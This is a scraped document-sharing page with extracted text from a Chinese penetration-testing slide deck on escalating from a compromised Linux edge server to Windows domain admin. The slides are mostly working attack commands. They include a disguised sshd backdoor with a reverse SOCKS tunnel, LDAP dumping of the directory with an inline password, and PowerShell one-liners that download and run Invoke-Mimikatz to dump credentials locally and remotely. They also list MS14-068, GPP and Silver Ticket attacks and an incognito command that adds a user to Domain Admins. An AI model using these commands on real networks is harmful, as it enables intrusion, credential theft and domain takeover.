欢迎来到天天文库
浏览记录
ID:39731329
大小:2.40 MB
页数:21页
时间:2019-07-10
《渗透测试中的技巧》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、渗透测试中的技巧Mickey议题的内容:快速获取域权限的方法黑客工具使用的逆向思维钓鱼站的access注入waf绕过目前已经掌握的情况搞定一台边界的Linux服务器数据库配置文件中有注释掉的一个域帐号当前机器不在域中我有root权限怎么收集信息?准备工作:方便本地kali下的工具使用,开个反弹socks5ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=31337ssh-o"StrictHostKeyCheckingno"-oUserKnownHostsFile=/dev/null-T-fND127.0.0.1:8888mail@127.0.0.1-p
2、31337ssh-o"StrictHostKeyCheckingno"-T-fNR8888:127.0.0.1:8888proxy@公网IP或者用CobaltStrike的beacon你为什么不直接用reGeorg?因为当时提示trimDirectiveWhitespaces错误!!域内信息收集Windows下很多工具获取域信息dsquery,AdFindldifde,Sysinternals'ADExplorer等linux下呢?我用ldapsearch+adoffline.pyroot@Gamer:~/#proxychainsldapsearch-hAD1.corp.target
3、.net-x-D"mickey@corp.target.net"-b"dc=corp,dc=target,dc=net"-Epr=1000/noprompt-oldif-wrap=no-w'password!@#'>clint.ldif域内信息收集ldapsearch+adoffline.py组合哪里好?离线的!!可搜索的!!查看description,comment,titleorinfo域有内容的sqlite>selectcn,description,title,comment,infofromview_userswhere(descriptionISNOTNULLortitle
4、ISNOTNULLorcommentISNOTNULLorinfoISNOTNULL);显示有计算机description的sqlite>selectcn,description,infoFROMview_computersWHERE(descriptionISNOTNULLorinfoISNOTNULL);显示域内的winxp和2000主机sqlite>selectdnsHostName,description,info,operatingSystemfromview_computerswhereoperatingSystemLIKE'%Windows%2000%'ORoperat
5、ingSystemLIKE'%Windows%XP%';查看域管理员sqlite>selectmember_cnfromview_activegroupuserswheregroup_cn="DomainAdmins";域内信息收集快速获取域权限的方法LowHangingFruit[找软柿子捏]神器kekeo[ms14068,比PyKEK方便]GPP[KB2962486]十分钟爱SQLSERVER弱口令和潜在的SilverTicket攻击[SPN]本地administrator帐户通杀+IncognitoDomainCache的破解管理员配置错误十分钟爱SQLSERVER弱口令和潜在
6、的SilverTicket攻击[SPN]明文密码抓取本地明文密码抓取:nohuppython-mSimpleHTTPServer8888&powershell"IEX(New-ObjectNet.WebClient).DownloadString('http://192.168.0.4/Invoke-Mimikatz.ps1');Invoke-Mimikatz–DumpCerts远程主机明文密码抓取如果开启了PowershellRemoting(类似WinRM,开放47001端口)Dump远程机器的密码powershell“IEX(New-ObjectNet.WebClient).D
7、ownloadString('http://192.168.0.4/Invoke-Mimikatz.ps1');Invoke-Mimikatz-DumpCreds-ComputerName@(‘computer1′,‘computer2′)”本地administrator帐户通杀+Incognito列举所hosts.txt里主机所有的token,将pentest用户加入到域管理员组D:>incognito.exe-fhosts.txt-uadminist
此文档下载收益归作者所有